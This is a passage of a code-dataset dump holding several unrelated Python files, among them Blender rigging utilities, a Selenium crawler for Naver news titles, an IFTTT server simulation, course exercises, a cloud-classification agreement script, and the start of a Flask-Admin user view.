pole_angle - math.radians(360)\n\n return pole_angle\n\n\n\ndef open_file(path):\n if platform.system() == \"Windows\":\n os.startfile(path)\n elif platform.system() == \"Darwin\":\n subprocess.Popen([\"open\", path])\n else:\n subprocess.Popen([\"xdg-open\", path])\n\nclass Side_Flipper:\n\n def __init__(self, left, right):\n self.left = left\n self.right = right\n\n def flip_name(self, name):\n\n flipped_name = None\n\n if self.left in name:\n flipped_name = name.replace(self.left, self.right)\n elif self.right in name:\n flipped_name = name.replace(self.right, self.left)\n\n return flipped_name\n\n def get_flipped_bone(self, bones, bone):\n\n flipped_bone = None\n if bones:\n if bone:\n flipped_bone_name = self.flip_name(bone.name)\n if flipped_bone_name:\n flipped_bone = bones.get(flipped_bone_name)\n\n return flipped_bone\n\n\n\ndef curve_to_mesh(object, resolution=None):\n\n offset = object.data.offset\n extrude = object.data.extrude\n taper_object = object.data.taper_object\n taper_radius_mode = object.data.taper_radius_mode\n bevel_mode = object.data.bevel_mode\n bevel_depth = object.data.bevel_depth\n use_fill_caps = object.data.use_fill_caps\n resolution_u = object.data.resolution_u\n\n object.data.offset = 0\n object.data.extrude = 0\n object.data.taper_object = None\n object.data.taper_radius_mode = \"OVERRIDE\"\n object.data.bevel_mode = \"ROUND\"\n object.data.bevel_depth = 0\n object.data.use_fill_caps = False\n\n if resolution:\n object.data.resolution_u = resolution\n\n deg = bpy.context.evaluated_depsgraph_get()\n me = bpy.data.meshes.new_from_object(object.evaluated_get(deg), depsgraph=deg)\n\n object.data.offset = offset\n object.data.extrude = extrude\n object.data.taper_object = taper_object\n object.data.taper_radius_mode = taper_radius_mode\n object.data.bevel_mode = bevel_mode\n object.data.bevel_depth = bevel_depth\n object.data.use_fill_caps = use_fill_caps\n object.data.resolution_u = resolution_u\n\n\n\n\n\n new_obj = bpy.data.objects.new(object.name + \"_mesh\", me)\n bpy.context.collection.objects.link(new_obj)\n\n new_obj.matrix_world = object.matrix_world\n\n return new_obj\n\ndef get_addon_preferences():\n addon_preferences = bpy.context.preferences.addons[addon_name].preferences\n return addon_preferences\n\ndef get_addon_name():\n return addon_name\n\ndef get_addon_directory():\n return addon_directory\n\ndef update_UI():\n for screen in bpy.data.screens:\n for area in screen.areas:\n area.tag_redraw()\n\ndef draw_subpanel(self, boolean, property, label, layout):\n\n if boolean:\n ICON = \"TRIA_DOWN\"\n else:\n ICON = \"TRIA_RIGHT\"\n\n row = layout.row(align=True)\n row.alignment = \"LEFT\"\n row.prop(self, property, text=label, emboss=False, icon=ICON)\n\n return boolean\n\n\ndef draw_subpanel_bool(source, boolean, property, bool_source, bool_prop, label, layout):\n\n if boolean:\n ICON = \"TRIA_DOWN\"\n else:\n ICON = \"TRIA_RIGHT\"\n\n row = layout.row(align=True)\n row.alignment = \"LEFT\"\n\n row.prop(source, property, text=\"\", emboss=False, icon=ICON)\n row.prop(bool_source, bool_prop, text=\"\")\n row.prop(source, property, text=label, emboss=False, icon=ICON)\n\n return boolean\n\n\n\ndef get_bounding_box(object):\n\n bbox_corners = [object.matrix_world * mathutils.Vector(corner) for corner in object.bound_box]\n\n return bbox_corners\n\n\ndef midpoint(coordinates, mode):\n\n if len(coordinates) > 0:\n\n if mode == \"BOUNDING_BOX\":\n\n x= []\n y= []\n z= []\n\n for coordinate in coordinates:\n x.append(coordinate[0])\n y.append(coordinate[1])\n z.append(coordinate[2])\n\n range_x = (max(x), min(x))\n range_y = (max(y), min(y))\n range_z = (max(z), min(z))\n\n bounding_box_coordinate = []\n\n for a in range_x:\n for b in range_y:\n for c in range_z:\n bounding_box_coordinate.append((a, b, c))\n\n return mathutils.Vector(numpy.array(bounding_box_coordinate).mean(axis=0))\n\n if mode == \"CENTER\":\n return mathutils.Vector(numpy.array(coordinates).mean(axis=0))\n else:\n return None\n\n\n\n\n\ndef object_switch_mode(object, mode):\n\n bpy.context.view_layer.update()\n\n Previous_Mode = object.mode\n\n if not object.visible_get():\n\n if not bpy.context.collection.objects.get(object.name):\n\n bpy.context.collection.objects.link(object)\n\n\n\n object.hide_viewport = False\n object.hide_set(False)\n\n object.hide_select = False\n\n if object.visible_get():\n\n object.select_set(True)\n bpy.context.view_layer.objects.active = object\n bpy.ops.object.mode_set(mode=mode, toggle=False)\n\n return Previous_Mode\n\n\n\ndef create_bone(armature, name, head, tail, deform, Flip_Bone = False):\n\n bone = armature.data.edit_bones.new(name)\n\n if Flip_Bone:\n bone.head = tail\n bone.tail = head\n else:\n bone.head = head\n bone.tail = tail\n\n bone.use_deform = deform\n\n return bone\n\ndef get_object_center(object, mode):\n\n if mode == \"ORIGIN\":\n # return object.matrix_world.inverted() @ object.location\n return object.matrix_world.inverted() @ object.matrix_world.to_translation()\n\n if mode in [\"CENTER\", \"BOUNDING_BOX\"]:\n\n if not object.type in [\"MESH\",\"CURVE\" , \"ARMATURE\"]:\n # return object.matrix_world.inverted() @ object.location\n return object.matrix_world.inverted() @ object.matrix_world.to_translation()\n\n if object.type == \"MESH\":\n # create_lists = [object.matrix_world @ vert.co for vert in object.data.vertices]\n create_lists = [vert.co for vert in object.data.vertices]\n\n if object.type == \"CURVE\":\n\n create_lists = []\n\n for spline in object.data.splines:\n\n for point in spline.points:\n # create_lists.append(object.matrix_world @ point.co)\n create_lists.append(point.co.xyz)\n\n for bezier_point in spline.bezier_points:\n # create_lists.append(object.matrix_world @ bezier_point.co)\n create_lists.append(bezier_point.co.xyz)\n\n if object.type == \"ARMATURE\":\n\n create_lists = []\n\n for bone in object.data.bones:\n # create_lists.append(object.matrix_world @ bone.head)\n # create_lists.append(object.matrix_world @ bone.tail)\n\n create_lists.append(bone.head)\n create_lists.append(bone.tail)\n\n if mode == \"CENTER\":\n return midpoint(create_lists, \"CENTER\")\n\n if mode == \"BOUNDING_BOX\":\n return midpoint(create_lists, \"BOUNDING_BOX\")\n\n\ndef Normal_To_Offset(object, location, normal, offset):\n\n mw = object.matrix_world.copy()\n\n o = location\n axis_src = normal\n axis_dst = mathutils.Vector((0, 0, 1))\n\n matrix_rotate = mw.to_3x3()\n matrix_rotate = matrix_rotate @ axis_src.rotation_difference(axis_dst).to_matrix().inverted()\n matrix_translation = mathutils.Matrix.Translation(mw @ o)\n\n Normal_Matrix = matrix_translation @ matrix_rotate.to_4x4() @ mathutils.Vector(offset)\n Normal_Offset = object.matrix_world.inverted() @ Normal_Matrix\n\n return Normal_Offset\n\ndef Average_Normals(Normals):\n average_normals = mathutils.Vector(numpy.sum(Normals, axis=0) / len(Normals))\n return average_normals\n\ndef Add_Weight(object, bone_name, indices):\n\n Vertex_Group = object.vertex_groups.get(bone_name) \n\n if Vertex_Group == None:\n Vertex_Group = object.vertex_groups.new( name = bone_name )\n \n\n\n Vertex_Group.add(indices, 1.0, 'REPLACE' )\n\n return Vertex_Group\n\ndef Add_Armature_Modifier(object, Armature, name=\"Armature\"):\n\n for modifier in object.modifiers:\n if modifier.type == \"ARMATURE\":\n if modifier.object == Armature:\n return modifier\n\n modifier = object.modifiers.new(type=\"ARMATURE\", name=name)\n modifier.object = Armature\n\n return modifier\n\ndef Hook_Vertex_Bone(object, armature, vertex_indices, bone_name, name=\"Hook\"):\n\n modifier = object.modifiers.new(type=\"HOOK\", name=name)\n modifier.object = armature\n modifier.subtarget = bone_name\n modifier.vertex_indices_set(vertex_indices)\n\n return modifier\n\ndef get_object_indices(object):\n\n if object.type == \"MESH\":\n indices = [vertex.index for vertex in object.data.vertices]\n return indices\n\n else:\n return None\n\ndef check_bone_select(bone, mode):\n\n if mode == \"EDIT_ARMATURE\":\n return bone.select\n\n if mode == \"POSE\":\n return bone.bone.select\n\n\ndef Create_Armature(name):\n\n armature = bpy.data.armatures.new(name)\n object = bpy.data.objects.new(name, armature)\n bpy.context.collection.objects.link(object)\n\n return object\n\ndef Create_Empty(name):\n\n object = bpy.data.objects.new(name, None)\n bpy.context.collection.objects.link(object)\n\n return object\n\ndef Hook_Vertex_Empty(object, empty, vertex_indices, name=\"Hook\"):\n\n modifier = object.modifiers.new(type=\"HOOK\", name=name)\n modifier.object = empty\n modifier.vertex_indices_set(vertex_indices)\n\n return modifier\n\ndef Normal_To_Orientation(object, location, normal):\n\n mw = object.matrix_world.copy()\n\n o = location\n axis_src = normal\n axis_dst = mathutils.Vector((0, 0, 1))\n\n matrix_rotate = mw.to_3x3()\n matrix_rotate = matrix_rotate @ axis_src.rotation_difference(axis_dst).to_matrix().inverted()\n matrix_translation = mathutils.Matrix.Translation(mw @ o)\n\n Normal_Matrix = matrix_translation @ matrix_rotate.to_4x4()\n\n return Normal_Matrix\n\ndef append_bone_shape(path):\n\n objects = []\n\n if path != \"None\":\n path = path\n section = \"/Object/\"\n directory = path + section\n filename = \"Widget\"\n\n bpy.ops.wm.append(filename=filename, directory=directory)\n\n objects = [object for object in bpy.context.selected_objects]\n\n return objects\n\n\ndef get_widgets_filepath():\n addon_dir = pathlib.Path(addon_directory)\n widget_file = pathlib.Path(\"{}/Widgets/Widget.blend\".format(addon_dir))\n\n return widget_file\n\ndef get_bone_shape_directory():\n addon_dir = addon_directory\n bone_shapes_directory = os.path.join(addon_dir, \"Widgets\")\n return bone_shapes_directory\n\n\npreview_collections = {}\n\ndef get_bone_shape_catagories():\n\n\n pcoll = bpy.utils.previews.new()\n pcoll.my_previews = ()\n preview_collections[\"main\"] = pcoll\n\n\n bone_shapes_directory = get_bone_shape_directory()\n bone_shapes_catagories = {}\n\n for dir in os.listdir(bone_shapes_directory):\n catagory_path = os.path.join(bone_shapes_directory, dir)\n\n if os.path.isdir(catagory_path):\n bone_shapes = []\n\n for bone_shape_name in os.listdir(catagory_path):\n\n bone_shape_path = os.path.join(catagory_path, bone_shape_name)\n\n if os.path.isfile(bone_shape_path) and bone_shape_path.endswith(\".blend\"):\n\n thumb = pcoll.load(bone_shape_path, bone_shape_path, \"BLEND\")\n\n bone_shape = {\"name\": bone_shape_name, \"path\": bone_shape_path, \"thumb\": thumb}\n bone_shapes.append(bone_shape)\n\n bone_shapes_catagory = {\"name\": dir, \"path\": catagory_path, \"bone_shapes\": bone_shapes}\n bone_shapes_catagories[dir] = bone_shapes_catagory\n\n return bone_shapes_catagories\n\ndef Format_String(Format, Dictionary):\n\n for key, item in Dictionary.items():\n Format = Format.replace(key, item)\n\n return Format\n\n\n\ndef subdivide_bone(object, bone, amount):\n\n edit_bones = object.data.edit_bones\n\n twist_bones = []\n\n for a in range(amount):\n newbone_name = \"TWIST_\" + str(a) + \"_\" + bone.name\n newbone = create_bone(object, newbone_name, bone.head, bone.tail, bone.use_deform, Flip_Bone = False)\n newbone.roll = bone.roll\n\n vector = bone.vector\n\n newbone.length = newbone.length / amount\n newbone.head += bone.vector/amount * a\n newbone.tail += bone.vector/amount * a\n\n if len(twist_bones) > 0:\n newbone.parent = twist_bones[-1]\n\n twist_bones.append(newbone)\n\n return twist_bones\n\ndef get_bone_layers(layer):\n layers = [False for layer in range(32)]\n layers[layer] = True\n return layers\n","repo_name":"BlenderBoi/Bonera","sub_path":"Utility_Functions.py","file_name":"Utility_Functions.py","file_ext":"py","file_size_in_byte":15166,"program_lang":"python","lang":"en","doc_type":"code","stars":23,"dataset":"github-code","pt":"21"} +{"seq_id":"40450662881","text":"# Selenium\r\n# pip install selenium\r\n\r\nfrom selenium import webdriver\r\nfrom selenium.webdriver.common.by import By\r\nfrom bs4 import BeautifulSoup\r\nfrom selenium.webdriver.common.keys import Keys\r\nimport time\r\n\r\nurl = \"https://www.naver.com/\"\r\n\r\ndriver = webdriver.Chrome() # Selenium 사용시 드라이버 생성\r\n\r\n# 페이지 접근\r\ndriver.get(url)\r\n\r\n# 페이지 정지(설정을 해놓지 않으면 켜지고 바로 꺼진다.)\r\ntime.sleep(1)\r\n\r\n# 검색어 창에 자동으로 '인공지능' text 입력하기(find_element-하나만 찾기, find_elements-여러개 찾기:리스트로 반환)\r\n# 검색창 element : <input id=\"query\" name=\"query\" type=\"search\" title=\"검색어를 입력해 주세요.\" placeholder=\"검색어를 입력해 주세요.\" maxlength=\"255\" autocomplete=\"off\" class=\"search_input\" data-atcmp-element=\"\">\r\n# driver.find_element(By.ID, \"query\").send_keys(\"인공지능\")\r\n# driver.find_element(By.CLASS_NAME, \"search_input\").send_keys(\"한국\")\r\n# driver.find_element(By.CSS_SELECTOR, '[placeholder=\"검색어를 입력해 주세요.\"]').send_keys(\"미국\")\r\ndriver.find_element(By.XPATH, '//*[@id=\"query\"]').send_keys('인공지능')\r\ntime.sleep(2)\r\n\r\n# 검색버튼 클릭하기 \r\n# 검색버튼 element : <button type=\"submit\" class=\"btn_search\" onclick=\"window.nclk_v2(this,"sch.action")\"> <span id=\"search-btn\" class=\"ico_btn_search\"></span> <span class=\"blind\">검색</span> </button>\r\n# driver.find_element(By.CLASS_NAME, 'btn_search').click()\r\n\r\n# 검색창에 입력 후 엔터\r\ndriver.find_element(By.XPATH, '//*[@id=\"query\"]').send_keys(Keys.ENTER)\r\ntime.sleep(2)\r\n\r\n# 뉴스 탭 클릭하기\r\ndriver.find_element(By.XPATH, '//*[@id=\"lnb\"]/div[1]/div/ul/li[4]/a').click()\r\ntime.sleep(2)\r\n\r\n# 페이지 긁어오기(동일한 작업이므로 함수로 만들기)\r\ndef get_page_news_title():\r\n # 뉴스 제목 crawling하기 (HTML 코드 가져오기)\r\n html = driver.page_source\r\n soup = BeautifulSoup(html, 'html.parser')\r\n # 뉴스 타이틀 리스트 찾기\r\n # <a href=\"http://www.newsis.com/view/?id=NISX20230613_0002336220&cID=10802&pID=14000\" class=\"news_tit\" target=\"_blank\" onclick=\"return goOtherCR(this, 'a=nws*a.tit&r=1&i=88000127_000000000000000011909352&g=003.0011909352&u='+urlencode(this.href));\" title=\"인천시, 초거대 인공지능과 지역특화산업 연계 모색\">인천시, 초거대 <mark>인공지능</mark>과 지역특화산업 연계 모색</a>\r\n # <a href=\"https://www.yna.co.kr/view/AKR20230612058200003?input=1195m\" class=\"news_tit\" target=\"_blank\" onclick=\"return goOtherCR(this, 'a=nws*a.tit&r=6&i=880000D8_000000000000000013995919&g=001.0013995919&u='+urlencode(this.href));\" title=\"포스코이앤씨, 건설업계 최초 'AI+' 인공지능 인증 획득\">포스코이앤씨, 건설업계 최초 'AI+' <mark>인공지능</mark> 인증 획득</a>\r\n news = soup.find_all('li', class_=\"bx\")\r\n for n in news:\r\n title = n.find('a', class_='news_tit')\r\n if title is not None:\r\n result = title.get_text()\r\n print(result)\r\n\r\n# 다음 페이지 이동(함수 생성)\r\ndef click_next_btn():\r\n # <a href=\"?where=news&sm=tab_pge&query=%EC%9D%B8%EA%B3%B5%EC%A7%80%EB%8A%A5&sort=0&photo=0&field=0&pd=0&ds=&de=&cluster_rank=23&mynews=0&office_type=0&office_section_code=0&news_office_checked=&nso=so:r,p:all,a:all&start=11\" role=\"button\" class=\"btn_next\" aria-disabled=\"false\" onclick=\"return goOtherCR(this, 'a=nws.paging&r=2&u='+urlencode(urlexpand(this.href)));\"><i class=\"spnew ico_page_arr\">다음</i></a>\r\n driver.find_element(By.CLASS_NAME, \"btn_next\").click()\r\n time.sleep(2)\r\n\r\n# 10번 반복하기\r\nfor i in range(10):\r\n get_page_news_title()\r\n click_next_btn()","repo_name":"Kimjong127/Python-Advanced","sub_path":"Crawling/crawl4.py","file_name":"crawl4.py","file_ext":"py","file_size_in_byte":3831,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"18833849698","text":"import random\nimport statistics as stat\nfrom typing import List, Callable, Tuple, Union\n\nimport simpy\n\nimport IFTTTModel.model as model\nfrom IFTTTModel.model import DAYS, HOURS, MINUTES, SECONDS\nimport IFTTTModel.visualization as vis\n\n\nclass Simulation:\n\n def __init__(self,\n num_users: int = 15000,\n mean_num_devices_per_user: int = 10,\n user_interaction_mean: float = 20,\n sim_length_days: int = 3 * DAYS + 1 * MINUTES,\n server_capacity: int = 30,\n server_response_mean: float = 1 * SECONDS,\n signal_slowness: float = 0.01 * SECONDS,\n num_servers: int = 3,\n boundary_side_length: float = 100,\n ):\n # print('Creating Simulations')\n self.num_users = num_users\n self.mean_num_devices_per_user = mean_num_devices_per_user\n self.stdv_num_devices_per_user = mean_num_devices_per_user * 0.2\n\n self.sim_length_days = sim_length_days\n\n self.user_interaction_mean = user_interaction_mean\n self.user_interaction_stdv = user_interaction_mean * 0.2\n\n self.server_capacity = server_capacity\n self.server_response_mean = server_response_mean\n self.server_response_stdv = server_response_mean * 0.2\n\n model.time_to_distance_ratio = signal_slowness\n\n self.num_servers = num_servers\n\n self.boundary_side_length = boundary_side_length\n\n self.users: List[model.User] = []\n self.servers: List[model.Server] = []\n\n self.has_run = False\n self.env = simpy.Environment()\n\n self.build_sim()\n\n def _get_position(self) -> Tuple[float, float]:\n return self.boundary_side_length * random.random(), self.boundary_side_length * random.random()\n\n def build_sim(self):\n\n for _ in range(self.num_servers):\n server_location = self._get_position()\n self.servers.append(model.Server(self.env, server_location, self.server_capacity,\n self.server_response_mean, self.server_response_stdv))\n\n # print('Creating users')\n for _ in range(self.num_users):\n user = model.User(self.env, self.user_interaction_mean, self.user_interaction_stdv)\n location = self._get_position()\n for _ in range(self._get_num_devices_for_user()):\n controller = model.SimpleController(self.env, location)\n device = model.ToggleDevice(self.env, location)\n steps = random.randint(1, self.num_servers)\n pipeline: List[Union[model.CommunicatingDevice, model.Server]] = random.sample(self.servers, steps)\n pipeline.insert(0, controller)\n pipeline.append(device)\n for i in range(1, len(pipeline) - 1):\n pipeline[i].register_connection(pipeline[i - 1], pipeline[i + 1])\n user.add_device_with_manual_controller(device, controller)\n\n self.users.append(user)\n self.env.process(user.run())\n\n def _get_num_devices_for_user(self) -> int:\n num_devices = 0\n while num_devices == 0:\n num_devices = round(random.normalvariate(self.mean_num_devices_per_user, self.stdv_num_devices_per_user))\n return num_devices\n\n def _post_simulation(fun: Callable):\n def new_method(self: 'Simulation', *args, **kwargs):\n if not self.has_run:\n raise Exception('Simulation must be run first!')\n return fun(self, *args, **kwargs)\n\n return new_method\n\n def run(self):\n if self.has_run:\n return # Only allow one run\n\n def progress_report(env: simpy.Environment):\n while True:\n yield env.timeout(1 * DAYS)\n print(f'Finished day {progress_report.day_number} of {int(self.sim_length_days / DAYS)}')\n progress_report.day_number += 1\n\n progress_report.day_number = 1\n\n def minute_report(env: simpy.Environment):\n while True:\n yield env.timeout(1 * SECONDS)\n print(f'Minute {divmod(env.now, DAYS)[1]}')\n\n # print('Starting Simulation')\n self.env.process(progress_report(self.env))\n self.env.process(minute_report(self.env))\n self.env.run(until=self.sim_length_days)\n self.has_run = True\n\n @_post_simulation\n def view_wait_times(self) -> None:\n vis.view_wait_times(self.users)\n\n def view_positions(self):\n vis.show_geographical_distribution(self.servers, self.users)\n\n def view_load_over_time(self):\n vis.show_loads_over_time(self.servers)\n\n @_post_simulation\n def get_max_and_mean_wait(self):\n # print('returning max and mean')\n wait_times = []\n for user in self.users:\n wait_times.extend([i for _, i in user.wait_times])\n max_wait = max(wait_times)\n mean_wait = stat.mean(wait_times)\n return max_wait, mean_wait\n\n\nif __name__ == '__main__':\n sim = Simulation(num_users=1)\n sim.run()\n print(sim.get_max_and_mean_wait())\n sim.view_load_over_time()\n sim.view_wait_times()\n","repo_name":"ZachClayburn/578FinalProject","sub_path":"IFTTTModel/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":5214,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"2796823070","text":"# Final Exam, Part 3 (N letter dictionary)\n# 0.0/20.0 puntos (calificados)\n# Write a function named n_letter_dictionary that receives a string (words separated by spaces) as parameter and returns a dictionary whose keys are numbers and whose values are lists that contain unique words that have the number of letters equal to the keys. \n#\n# For example, when your function is called as:\n#\n# n_letter_dictionary(\"The way you see people is the way you treat them and the Way you treat them is what they become\")\n# Then, your function should return a dictionary such as\n# {2: ['is'], 3: ['and', 'see', 'the', 'way', 'you'], 4: ['them', 'they', 'what'], 5: ['treat'], 6: ['become', 'people']}\n# Notes:\n# Each list of words with the same number of letters should be sorted in ascending order\n# The words in a list should be unique. For example, even though the word \"them\" is repeated twice in the above sentence, it is only considered once in the list of four letter words.\n# Capitalization does not matter, this means that all the words should be converted to lower case. For example the words \"The\" and \"the\" appear in the sentence but they are both considered as lower case \"the\".\n# Do NOT import any module for solving this problem.\n#\ndef n_letter_dictionary(string):\n my_dictionary={}\n string=string.lower()\n string=string.split(' ')\n lista_unica=[]\n #quitando palabras repetidas\n for words in string:\n if words not in lista_unica:\n lista_unica.append(words)\n #Ordenando numericamente por candidad de letras\n #hasta 15 caracteres por palabra\n for k in range(1,15):\n lista_palabras=[]\n n_letter_words=0\n for word in lista_unica:\n #k cantidad de caracteres por palabra\n if len(word)==k:\n n_letter_words=n_letter_words+1\n lista_palabras.append(word)\n if lista_palabras!=[]:\n lista_palabras.sort()\n my_dictionary[k] = lista_palabras\n return my_dictionary\n\n# OJO SOLO LA FUNCION!!! \n# Main\nstring = \"I loved a girl once\"\n\nevalua_n_letter_dictionary = n_letter_dictionary(string)\nprint(evalua_n_letter_dictionary)","repo_name":"ivanromanv/manuales","sub_path":"Python/Edx_Course/Introduction to Programming Using Python/Excercises/FinalExam_P3_Function_diccionario_n_letras.py","file_name":"FinalExam_P3_Function_diccionario_n_letras.py","file_ext":"py","file_size_in_byte":2160,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"22428120187","text":"\"\"\"\nCalculation of agreement between different classification\napproaches.\n\"\"\"\n\ndomain = [10, 24, -61, -40] # domain of original data [lat1, lat2, lon1, lon2]\nlat0, lat1, lon0, lon1 = [10, 20, -58, -48]\nlabel_map= {'Sugar':0, 'Fish': 3, 'Flowers': 2, 'Flower': 2, 'Gravel': 1}\nlabel_map_rv = {0:'Sugar', 1:'Gravel', 2: 'Flowers', 3: 'Fish'}\ncolor_dict = {'Sugar':'#A1D791','Fish':'#2281BB','Gravel':'#3EAE47', 'Flowers': '#93D2E2'}\n\nfn_ABI_IR = '../auxiliary_data/GOES16_CH13_classifications_EUREC4A_30min.zarr/'\nfiles_manualClassifications_l3 = {\n \"manualVIS\": '../processed_data/EUREC4A_ManualClassifications_l3_VIS_instant.zarr',\n \"manualIR\": '../processed_data/EUREC4A_ManualClassifications_l3_IR_instant.zarr',\n \"manualICON\": '../processed_data/EUREC4A_ManualClassifications_l3_albedo_instant.zarr' \n}\nfn_iorg = '../auxiliary_data/GOES16_IR_nc_Iorg_EUREC4A_10-20_-58--48.nc'\n\nimport tqdm\nimport dask\nimport zarr\nimport xarray as xr\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom matplotlib.patches import Circle, Wedge, Polygon\nfrom matplotlib.collections import PatchCollection\nimport datetime as dt\nimport pandas as pd\n\nimport sys, os\nsys.path.append(\"/home/mpim/m300408/CloudClassification/sugar-flower-fish-or-gravel\")\nsys.path.remove(os.path.abspath(os.path.dirname(sys.argv[0])))\nfrom pyclouds.imports import *\nfrom pyclouds.helpers import *\nfrom pyclouds.zooniverse import *\nfrom pyclouds.plot import *\n\nimport pyclouds\nprint(pyclouds.__file__)\n\ndel tqdm\nimport tqdm\n\nsys.path.append(\"../notebooks/\")\nimport glob\nfrom agreement_helpers import *\n\nimport argparse\nimport logging\n\nlogging.info(f\"pandas version: {pd.__version__}\")\n\ndef get_args():\n parser = argparse.ArgumentParser(description=__doc__)\n parser.add_argument('-t', '--threshold', help='Agreement threshold', required=False, default=0.1)\n\n args = vars(parser.parse_args())\n\n return args\n\n\nargs = get_args()\nfrequency_threshold = float(args[\"threshold\"])\n\n### Open neural network classifications\nmask_ABI_IR = xr.open_zarr(fn_ABI_IR)\n\nfor workflow, l3_file in sorted(files_manualClassifications_l3.items()):\n ### Open manual classifications\n if '.zarr' in l3_file:\n mask_manual_classifications = xr.open_zarr(l3_file)\n elif '.nc' in l3_file:\n mask_manual_classifications = xr.open_dataset(l3_file)\n else:\n logging.error('File format not supported')\n \n # find common times\n time_set_A = set(mask_ABI_IR.time.dt.floor(freq='1T').values)\n time_set_B = set(mask_manual_classifications.date.values)\n common_dates = np.array([*time_set_A.intersection(time_set_B)])\n times_of_interest = sorted(np.unique(common_dates))\n\n time_mask_ABIIR = np.in1d(mask_ABI_IR.time.dt.floor(freq='1T').values,common_dates)\n\n mask_ABI_IR_timesel = mask_ABI_IR.sel(time=time_mask_ABIIR)\n mask_ABI_IR_timesel['date'] = mask_ABI_IR_timesel.time.dt.floor(freq='1T')\n\n mask_manual_timesel = mask_manual_classifications.sel(date=common_dates)\n\n results = {}\n\n logging.info(\"Find common times to all datasets\")\n sizes_calculated = False\n\n for ii, i in enumerate(tqdm.tqdm(range(len(times_of_interest)))):\n mask_ABI_IR_timestep = mask_ABI_IR_timesel.where(mask_ABI_IR_timesel.date == times_of_interest[i], drop=True)\n mask_manual_timestep = mask_manual_timesel.sel(date=times_of_interest[i])\n\n\n\n mask_ABI_IR_timestep = mask_ABI_IR_timestep.sel(latitude=slice(lat1, lat0),longitude=slice(lon0, lon1))\n mask_manual_timestep = mask_manual_timestep.sel(latitude=slice(lat1, lat0),longitude=slice(lon0, lon1))\n\n if sizes_calculated is False:\n size_ABI = len(mask_ABI_IR_timestep.latitude)*len(mask_ABI_IR_timestep.longitude)\n size_manual = len(mask_manual_timestep.latitude)*len(mask_manual_timestep.longitude)\n sizes_calculated = True\n\n pattern_results = {}\n\n for p, pattern in enumerate(['Sugar', 'Gravel', 'Flowers', 'Fish']):\n pattern_results[pattern] = {}\n if pattern != 'Unclassified':\n # there is no unclassified category in the neural network classifications\n arr_ABI = mask_ABI_IR_timestep.mask.sel(pattern=pattern)\n merged_mask_ABI = merge_mask(arr_ABI)\n merged_mask_ABI = merged_mask_ABI.fillna(False).astype(bool).load()\n pattern_results[pattern][\"area_fraction_ABI\"] = np.count_nonzero(merged_mask_ABI)/size_ABI\n\n if p == 0:\n total_classification_mask_ABI = merged_mask_ABI\n else:\n total_classification_mask_ABI += merged_mask_ABI\n\n arr_manual = mask_manual_timestep.freq.sel(pattern=pattern)\n merged_mask_manual = arr_manual > frequency_threshold\n merged_mask_manual = merged_mask_manual.load()\n pattern_results[pattern][f\"area_fraction_{workflow}\"] = np.count_nonzero(merged_mask_manual)/size_manual\n\n if p == 0:\n total_classification_mask = merged_mask_manual\n else:\n total_classification_mask += merged_mask_manual\n\n if pattern != 'Unclassified':\n iou_ABI_Manual = iou_one_class_from_annos(merged_mask_ABI.values,\n merged_mask_manual.values,\n return_iou = True)\n\n pattern_results[pattern][f\"iou_ABI_{workflow}\"] = iou_ABI_Manual\n pattern_results[pattern][f\"missing_ABI_{workflow}\"] = identify_where_class_missing(merged_mask_ABI,\n merged_mask_manual)\n\n pattern_results['Unclassified'] = {f\"area_fraction_{workflow}\":np.count_nonzero(~total_classification_mask)/size_manual,\n \"area_fraction_ABI\":np.count_nonzero(~total_classification_mask_ABI)/size_manual\n }\n results[times_of_interest[i]] = pattern_results\n df = pd.DataFrame.from_dict(results, orient='index')\n output_folder = f'../temporary_data/agreement_threshold{frequency_threshold}'\n if not os.path.exists(output_folder):\n os.makedirs(output_folder)\n df.to_pickle(output_folder+f'/agreement_results_ABI-IR_vs_{workflow}.pkl')\n","repo_name":"observingClouds/C3ONTEXT","sub_path":"scripts/calculate_agreement.py","file_name":"calculate_agreement.py","file_ext":"py","file_size_in_byte":6364,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"5913986830","text":"\"\"\"\n 16 - Faça um programa para uma loja de tintas. O programa deverá pedir o tamanho em metros quadrados da área a ser pintada.\n Considere que a cobertura da tinta é de 1 litro para cada 3 metros quadrados e que a tinta é vendida em latas de 18 litros, que custam R$ 80,00.\n Informe ao usuário a quantidades de latas de tinta a serem compradas e o preço total.\n\"\"\"\n#import math\n\narea = int(input(\"Digite quantos metros quadrados tem a àrea a ser pintada:\"))\n\nlitroTintaUsada = area/3\n\n#latas = math.ceil(litroTintaUsada/18)\n\n\n\nlatas = 0\nif litroTintaUsada % 18 == 0:\n latas = litroTintaUsada/18\nelse:\n latas = int(litroTintaUsada/18) + 1\n\n\n\"\"\"\ncompletar = (litroTintaUsada/18)\n\ncomp = ( completar * 100)\n\nresto = 10 - comp\n\nlatas = (resto/10) + (comp/10)\n\n\n\n\"\"\"\ntotal = latas * 80.00\n\nprint(\"Será necessário comprar \",latas,\"(s) Dando um total de R$\",total)","repo_name":"RafaelMuniz94/Primeiros-Passos","sub_path":"Exercicios/Exercicio16.py","file_name":"Exercicio16.py","file_ext":"py","file_size_in_byte":884,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"22644581792","text":"import os\nfrom datetime import date\nimport pandas as pd\nimport json\nfrom jinja2 import Markup\nimport uuid\nfrom flask import request, render_template\nfrom flask_admin.model import typefmt\nfrom flask_admin.contrib.sqla import ModelView\nfrom flask_admin.form.upload import FileUploadField\nfrom wtforms import PasswordField\nfrom wtforms.validators import DataRequired\nfrom KashTable.models import AVAILABLE_USER_TYPES\nfrom KashTable import bcrypt\nfrom KashTable.config import Config\nfrom KashTable.posts import utils\n\n\n# Create directory for file fields to use\nfile_path = Config.FILE_PATH + '/archive'\n\ntry:\n os.mkdir(file_path)\nexcept OSError:\n pass\n\n\nclass CustomPasswordField(PasswordField): \n \n def populate_obj(self, obj, name):\n setattr(obj, name, bcrypt.generate_password_hash(self.data).decode('utf-8'))\n\n\nclass UserCRUD(ModelView):\n \n list_template = 'admin/my_clients.html'\n page_size = 100\n can_set_page_size = True\n can_view_details = True\n can_export = True\n export_types = ['csv', 